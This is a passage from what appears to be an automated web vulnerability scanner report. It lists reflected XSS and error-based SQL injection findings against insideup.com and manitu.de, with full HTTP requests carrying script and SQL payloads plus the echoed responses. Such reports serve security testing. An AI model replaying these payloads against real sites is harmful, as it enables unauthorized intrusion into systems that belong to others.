GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%2777a25'%3balert(1)//b75a0f29006 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'77a25';alert(1)//b75a0f29006' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.89. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84466'%3balert(1)//201a5427a00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84466';alert(1)//201a5427a00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&84466'%3balert(1)//201a5427a00=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5363
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&84466';alert(1)//201a5427a00=1' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.90. http://www.manitu.de/shop/ [account_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the account_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e0c2"><script>alert(1)</script>e1fa66e6668 was submitted in the account_id parameter. This input was echoed as 6e0c2\"><script>alert(1)</script>e1fa66e6668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=6e0c2"><script>alert(1)</script>e1fa66e6668&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:25:51 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="account_id" value="6e0c2\"><script>alert(1)</script>e1fa66e6668" style="width:100px;">
...[SNIP]...

5.91. http://www.manitu.de/shop/ [billc_birthdate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_birthdate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c905c"><script>alert(1)</script>e53c535973d was submitted in the billc_birthdate parameter. This input was echoed as c905c\"><script>alert(1)</script>e53c535973d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=c905c"><script>alert(1)</script>e53c535973d&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:08 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16972

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_birthdate" value="c905c\"><script>alert(1)</script>e53c535973d" style="width:150px;">
...[SNIP]...

5.92. http://www.manitu.de/shop/ [billc_city parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2308d"><script>alert(1)</script>11be4decd10 was submitted in the billc_city parameter. This input was echoed as 2308d\"><script>alert(1)</script>11be4decd10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=2308d"><script>alert(1)</script>11be4decd10&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:01 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16981

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_city" value="2308d\"><script>alert(1)</script>11be4decd10" style="width:250px;">
...[SNIP]...

5.93. http://www.manitu.de/shop/ [billc_email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18208"><script>alert(1)</script>e2e4d6cdcf4 was submitted in the billc_email parameter. This input was echoed as 18208\"><script>alert(1)</script>e2e4d6cdcf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=18208"><script>alert(1)</script>e2e4d6cdcf4&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:57 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17045

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_email" value="18208\"><script>alert(1)</script>e2e4d6cdcf4" style="width:300px;">
...[SNIP]...

5.94. http://www.manitu.de/shop/ [billc_fax parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_fax request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ea4f"><script>alert(1)</script>4612d8d6ccd was submitted in the billc_fax parameter. This input was echoed as 1ea4f\"><script>alert(1)</script>4612d8d6ccd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=1ea4f"><script>alert(1)</script>4612d8d6ccd&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:44 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_fax" value="1ea4f\"><script>alert(1)</script>4612d8d6ccd" style="width:180px;">
...[SNIP]...

5.95. http://www.manitu.de/shop/ [billc_firstname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_firstname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6099"><script>alert(1)</script>2ec26a9320f was submitted in the billc_firstname parameter. This input was echoed as a6099\"><script>alert(1)</script>2ec26a9320f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=a6099"><script>alert(1)</script>2ec26a9320f&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:43 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16977

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_firstname" value="a6099\"><script>alert(1)</script>2ec26a9320f" style="width:150px;">
...[SNIP]...

5.96. http://www.manitu.de/shop/ [billc_lastname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_lastname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc427"><script>alert(1)</script>88472088dee was submitted in the billc_lastname parameter. This input was echoed as cc427\"><script>alert(1)</script>88472088dee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=cc427"><script>alert(1)</script>88472088dee&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:55 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16976

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_lastname" value="cc427\"><script>alert(1)</script>88472088dee" style="width:150px;">
...[SNIP]...

5.97. http://www.manitu.de/shop/ [billc_organization parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_organization request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e90c4"><script>alert(1)</script>4c422d990fd was submitted in the billc_organization parameter. This input was echoed as e90c4\"><script>alert(1)</script>4c422d990fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=e90c4"><script>alert(1)</script>4c422d990fd&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:26:04 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_organization" value="e90c4\"><script>alert(1)</script>4c422d990fd" style="width:300px;">
...[SNIP]...

5.98. http://www.manitu.de/shop/ [billc_phone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb713"><script>alert(1)</script>9025fab3457 was submitted in the billc_phone parameter. This input was echoed as eb713\"><script>alert(1)</script>9025fab3457 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=eb713"><script>alert(1)</script>9025fab3457&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:28:30 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16971

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_phone" value="eb713\"><script>alert(1)</script>9025fab3457" style="width:180px;">
...[SNIP]...

5.99. http://www.manitu.de/shop/ [billc_street1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_street1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7112b"><script>alert(1)</script>9eef17d54b4 was submitted in the billc_street1 parameter. This input was echoed as 7112b\"><script>alert(1)</script>9eef17d54b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=7112b"><script>alert(1)</script>9eef17d54b4&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:22 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16972

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<input type="text" name="billc_street1" value="7112b\"><script>alert(1)</script>9eef17d54b4" style="width:300px;">
...[SNIP]...

5.100. http://www.manitu.de/shop/ [billc_street2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the billc_street2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bf1b"><script>alert(1)</script>a77f499cb1c was submitted in the billc_street2 parameter. This input was echoed as 8bf1b\"><script>alert(1)</script>a77f499cb1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=8bf1b"><script>alert(1)</script>a77f499cb1c&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:27:35 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 17037

<HTML>
   
   <HEAD>
   
